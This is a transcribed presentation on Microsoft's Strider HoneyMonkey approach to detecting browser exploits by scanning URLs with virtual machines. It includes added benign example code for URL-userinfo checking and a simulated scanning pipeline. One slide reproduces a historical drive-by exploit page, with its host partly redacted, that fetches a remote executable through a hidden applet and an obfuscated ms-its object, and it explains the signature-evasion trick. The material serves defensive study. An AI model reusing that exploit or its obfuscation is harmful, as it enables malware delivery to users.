Automated Web Patrol with Strider Honeymonkeys - PowerPoint PPT Presentation


Description:

This project detects browser exploits, malware and spyware using HoneyMonkeys, an approach proposed by Microsoft.


Transcript and Presenter's Notes



1
Automated Web Patrol With Strider Honeymonkeys
2
A look at the Web -
3
Why do we care about spam?
  • Users want to:
    - Look at quality pages on the web
    - Interact without the trouble of moderation
    - Surf safely
  • Search engines want to:
    - Attract traffic
    - Provide good search results
    - Profit from ads

4
Web Patrol
Need of the hour: why automated web patrol?
We implement an automated web patrol system that uses Strider HoneyMonkey programs running inside virtual machines.
  1. Manual analyses are expensive.
  2. Automated web patrol aims to significantly reduce the cost of monitoring malicious web sites.
  3. It can help identify those responsible for malicious acts.
  4. It is more efficient.
5
Strider HoneyMonkeys
  • A monkey program drives the browser in a way that mimics a human user's operation.
  • HoneyMonkey is a dynamic and active way of detecting threats: the monkey goes to the suspect page instead of waiting to be attacked.
  • The Strider HoneyMonkey assesses whether visiting the page resulted in harmful code being injected into the machine.
  • Logs and reports are generated once the alarm is set off.

6
HoneyMonkeys
Basic functionalities
  1. Run OSs of various patch levels.
  2. Mimic human web browsing, and use StriderTracer to catch file-creation and system-configuration changes.
  3. Discover malicious web sites.

[Figure: malcode reaching virtual machines running OS 1, OS 2 and OS 3 at different patch levels]
7
BROWSER-BASED VULNERABILITIES
  • Code obfuscation: deliberately adding confusion
  • URL redirection: re-directing the user to other sites
  • Vulnerability exploitation: exploiting multiple browser vulnerabilities
  • Malware installation: installing viruses, worms and Trojans
8
Obfuscation
  • Internet-based activities that subvert web technologies:
  • Phishing (fraud)
  • Traffic redirection
  • Hosting of illegal sites

E.g. URL obfuscation:
http://www.usfca.edu@www.cse.scu.edu/tschwarz/coen252_03/index.html
URL rules interpret everything before the "@" as a userid, so the browser actually connects to www.cse.scu.edu while the victim reads www.usfca.edu. The attacker relies on this portion of the URL (the real host after the "@") being hidden or overlooked.
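Where the browser really connects for such a URL, as an added example in Node.js that is not part of the presentation: the WHATWG URL parser (the one built into Node.js and modern browsers) is asked for the host and the userinfo separately. The slide's URL is used as input alongside two constructed comparison URLs; `inspectUrl` and `displayedHostMatches` are hypothetical helper names, and the "userinfo looks like a hostname" rule is an assumption of this example.

```javascript
// Added example: where does the browser really go for a URL like
// http://www.usfca.edu@www.cse.scu.edu/...?  Uses the WHATWG URL parser
// built into Node.js and modern browsers.  The classification rule is an
// assumption of this example, not something the presentation defines.

function inspectUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return { ok: false, reason: 'unparseable URL' };
  }
  // Everything between "://" and "@" is userinfo, not part of the host.
  const username = decodeURIComponent(url.username);
  // Userinfo that itself looks like a hostname is the classic trick: the
  // victim reads the familiar domain in front of the "@" and stops there.
  const userinfoLooksLikeHost = /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(username);
  return {
    ok: true,
    realHost: url.hostname,          // where the connection is actually made
    userinfo: username,              // what the victim is meant to read
    suspicious: userinfoLooksLikeHost,
  };
}

// Compare the host a user was shown (link text, status bar, e-mail body)
// against the host the URL resolves to.
function displayedHostMatches(raw, shownHost) {
  const r = inspectUrl(raw);
  return r.ok && r.realHost.toLowerCase() === shownHost.toLowerCase();
}

// Sample inputs: the slide's URL plus two constructed comparison URLs.
const SAMPLES = [
  'http://www.usfca.edu@www.cse.scu.edu/tschwarz/coen252_03/index.html',
  'http://www.cse.scu.edu/tschwarz/coen252_03/index.html',
  'http://alice@intranet.example/wiki',   // ordinary userinfo, not a host
];

for (const s of SAMPLES) {
  const r = inspectUrl(s);
  console.log(s, '->', r.realHost, r.suspicious ? '(SUSPICIOUS userinfo: ' + r.userinfo + ')' : '');
}
```

The check is deliberately about the authority component only: path tricks, look-alike characters and shortened URLs need other tests. Modern browsers warn on or strip such userinfo, but the 2005-era browsers the deck targets did not.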
9
Obfuscation methods
  (1) Dynamic code injection using document.write()
  (2) Long strings with encoded characters that are decoded by the unescape() function
  (3) A custom decoding routine included in the script
  (4) Substrings replaced using the replace() function
Obfuscation limits the ability of detectors such as signature-based anti-virus software to detect attacks that leverage exploit code.

10
URL Redirection
  • Primary URL -> Secondary URL
  • Protocol redirection using an HTTP 302 temporary redirect
  • HTML tags
  • Script functions including window.location.replace()

[Figure: the user visits the primary URL http://<IP address>/, which redirects to the secondary URL http://<IP address>/<8 chars>/test2/iejp.htm]
11
Vulnerability Exploitation
Example of vulnerability
Exploit 1 (the malicious hostname was redacted by the authors; the angle brackets, quotes, "=" signs and the "&#NNN;" framing of the character references were lost in the transcript and are restored here):

  <html><head><title></title></head><body>
  <style> CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style>
  <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
    <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'>
  </APPLET>
  <script>
  try {
    document.write('<object data=&#109;&#115;&#45;&#105;&#116;&#115;&#58;' +
      '&#109;&#104;&#116;&#109;&#108;&#58;&#102;&#105;&#108;&#101;&#58;//' +
      'C:\fo' + 'o.mht!' + 'http://vxxxx' + 'xxe.biz//adv' + 'erts//033//targ.ch' +
      'm/targ' + 'et.htm type=text/x-scriptlet></ob' + 'ject>');
  } catch (e) {}
  </script></body></html>

The page stacks three delivery mechanisms: a CSS cursor pointing at an .anr file, a hidden 1x1 Java applet whose "url" parameter names a win32.exe, and an <object> whose data attribute, once the numeric character references are decoded, reads ms-its:mhtml:file://C:\foo.mht!http://... (a .chm fetched over HTTP through the MHTML and ITS protocol handlers). The scheme is written as character references and the URL is split into concatenated string pieces so that no contiguous signature appears in the page source.
Exploit 2
Exploit 3
12
Malware Installation
  • Viruses
  • Backdoor functions
  • Bot programs
  • Trojan downloaders
  • Trojan droppers
  • Trojan proxies
  • Spyware programs

13
HoneyMonkey Stage 1
HoneyMonkey system
  • Visit n URLs simultaneously in one VM.
  • If an exploit is detected, re-visit each URL individually until the exploit URL(s) are found.

[Figure: one VM visits U1 to U6 together; after a detection a VM revisits U1, U2, ... one at a time]
14
HoneyMonkey Stage 2
HoneyMonkey system
  • Re-scan the exploit URLs.
  • Perform recursive redirection analysis.
  • Identify all web pages involved.

[Figure: re-scanning U2 and U3 reveals that they lead on to further pages U9 and U10]
15
HoneyMonkey Stage 3
HoneyMonkey system
  • Re-scan the exploit URLs.
  • Scan using fully patched VMs.
  • Identify attacks exploiting the latest vulnerabilities (those no current patch closes).

[Figure: U2, U3, U9 and U10 are re-scanned on a fully patched VM; only U2 and U9 still exploit it]
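The three stages above, together with the node and site ranking derived from the stage-2 topology, as an added example in Node.js that is not part of the presentation or of Microsoft's HoneyMonkey system. The pages, their redirect relations and their exploit behaviour are constructed data on reserved .example hosts; `visit` stands in for one VM session whose detector (StriderTracer's file and registry change log in the real system) is replaced by a per-page flag. Every function name here is hypothetical.

```javascript
// Added example, not code from the presentation or from Microsoft's HoneyMonkey
// system: the three scanning stages run against a constructed in-memory "web".
// A real HoneyMonkey flags an exploit when StriderTracer sees unexpected file or
// registry changes in the VM; here that detector is replaced by a per-page flag.

// Constructed ground truth (reserved .example hosts).  exploit: null = clean,
// 'patched' = exploits a hole that a fully patched VM no longer has,
// 'zero-day' = exploits even a fully patched VM.
const WEB = {
  'http://u1.example/': { exploit: null, redirectsTo: [] },
  'http://u2.example/': { exploit: null, redirectsTo: ['http://provider.example/a'] },
  'http://u3.example/': { exploit: null, redirectsTo: ['http://provider.example/b'] },
  'http://u4.example/': { exploit: null, redirectsTo: [] },
  'http://u5.example/': { exploit: null, redirectsTo: [] },
  'http://u6.example/': { exploit: null, redirectsTo: [] },
  'http://u7.example/': { exploit: null, redirectsTo: ['http://provider.example/a'] },
  'http://u8.example/': { exploit: null, redirectsTo: [] },
  'http://provider.example/a': { exploit: 'zero-day', redirectsTo: [] },
  'http://provider.example/b': { exploit: 'patched', redirectsTo: [] },
};

// One simulated VM session: the browser is pointed at every URL in `urls`,
// follows redirects, and the detector reports whether anything got in.
// The redirect edges are returned so stage 2 can build the topology graph.
function visit(urls, fullyPatched) {
  const seen = new Set(), edges = [], queue = [...urls];
  let exploited = false;
  while (queue.length) {
    const u = queue.shift();
    if (seen.has(u)) continue;
    seen.add(u);
    const page = WEB[u] || { exploit: null, redirectsTo: [] };
    if (page.exploit === 'zero-day' || (page.exploit === 'patched' && !fullyPatched)) exploited = true;
    for (const t of page.redirectsTo) { edges.push([u, t]); queue.push(t); }
  }
  visit.count += 1;   // a VM session (and the re-imaging after it) is the cost unit
  return { exploited, edges, pages: [...seen] };
}
visit.count = 0;

// Stage 1: scan URLs in groups; only a group that trips the detector is
// re-visited one URL at a time, so clean groups cost a single VM session.
function stage1(urls, groupSize) {
  const exploitUrls = [];
  for (let i = 0; i < urls.length; i += groupSize) {
    const group = urls.slice(i, i + groupSize);
    if (!visit(group, false).exploited) continue;
    for (const u of group) if (visit([u], false).exploited) exploitUrls.push(u);
  }
  return exploitUrls;
}

// Stage 2: re-scan each exploit URL alone and record every redirect, so all
// pages involved (redirectors and the final exploit providers) are identified.
function stage2(exploitUrls) {
  const nodes = new Set(), edges = [];
  for (const u of exploitUrls) {
    const r = visit([u], false);
    r.pages.forEach(p => nodes.add(p));
    edges.push(...r.edges);
  }
  return { nodes: [...nodes], edges };
}

// Stage 3: re-scan every page involved on a fully patched VM; whatever still
// exploits it is using a vulnerability no current patch closes.
function stage3(nodes) {
  return nodes.filter(u => visit([u], true).exploited);
}

// Node ranking by connection count (pages redirecting into a node) and site
// ranking by number of exploit URLs a host serves.
function rank(edges, exploitPages) {
  const inDegree = {}, perSite = {};
  for (const [, to] of edges) inDegree[to] = (inDegree[to] || 0) + 1;
  for (const u of exploitPages) {
    const host = new URL(u).hostname;
    perSite[host] = (perSite[host] || 0) + 1;
  }
  const desc = (a, b) => b[1] - a[1];
  return { byDegree: Object.entries(inDegree).sort(desc), bySite: Object.entries(perSite).sort(desc) };
}

function runPipeline(urls, groupSize) {
  visit.count = 0;
  const exploitUrls = stage1(urls, groupSize);
  const topology = stage2(exploitUrls);
  const zeroDay = stage3(topology.nodes);
  return { exploitUrls, topology, zeroDay, ranking: rank(topology.edges, topology.nodes), vmVisits: visit.count };
}

console.log(JSON.stringify(runPipeline(Object.keys(WEB).slice(0, 8), 4), null, 2));
```

Run on the eight constructed front-door URLs in groups of four, stage 1 spends 10 VM sessions instead of 8 because both groups happen to be dirty; with the 1.28% hit rate the deck reports, most groups are clean and grouping pays off. Stage 1 follows the slide literally and re-visits every URL of a dirty group; splitting the group in halves would cut that further but is not what the slide describes. The ranking makes provider.example stand out both by connection count (two redirectors point at /a) and by exploit URLs hosted, which is the "most powerful exploit page" idea of the later topology slides.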
16
FLOWCHART / REPORT
  • Scan up to 500-700 URLs per day

17
Input URL lists
  • Suspicious URLs: known to host spyware or malware; links appearing in phishing or spam messages.
  • Most popular web sites: top 100,000 by browser traffic ranking.
  • Local URLs: organizations that want to verify their web pages have not been compromised.

Output URL data
  • Exploit URLs: measure the risk of visiting similar web sites.
  • Topology graphs: several URLs have been shut down; they provide leads for anti-spyware research.
  • Zero-day exploits: monitors URL upgrades.

18
EXPERIMENTAL RESULTS
  • Collected about 16,000 URLs from:
    - a web search of known-bad web sites
    - a web search for Windows hosts files
    - depth-2 crawling of the previous URLs
  • 207 of 16,190 URLs (1.28%) were exploit URLs
  • All tests done using Internet Explorer 6

19
TOPOLOGY GRAPHS / NODE RANKING
  • 17 exploit URLs for SP2-PP (Windows XP SP2, partially patched)
  • Node ranking picks out the most powerful exploit pages

20
SITE RANKING
  • Based on connection counts
  • Based on number of exploit URLs hosted

21
Effective Monitoring
  • Exploit URLs are useful for detecting zero-day exploits.
  • Content providers with well-known URLs must keep those URLs alive to retain their high traffic, so they remain available for repeated scanning.
  • Highly ranked URLs are more likely to upgrade their exploits.
  • Hence: keep scanning the popular URLs.
22
  Strengths
  • HoneyMonkey will detect most Trojan viruses, backdoor functions and spyware programs.
  • Uniform detection of exploits: known-vulnerability attacks and zero-day exploits alike.
  • Generates an XML report for each visit.
  Weaknesses
  • Takes time to clean the infected machine after each site visit.
  • Obfuscation escapes anti-virus software.
  • HM waits only 2 minutes per URL, so a page can delay its exploit to escape detection.
  • Attacks may be randomized, confusing the HMs.
  • HM can be detected by sending it a dialog box (a monkey does not respond the way a human does).

23
Scope for Improvements
  • Run HoneyMonkey with random wait times to combat delayed exploits on sites.
  • Randomize the HoneyMonkey's visits.
  • Vulnerability-specific exploit detector: insert break points within the bad code and stop execution before the potentially malicious code runs.
  • Accuracy needs more work.
  • More classification according to content is needed.
  • The HoneyMonkeys should get better at avoiding detection.

24
Thank You
Any Questions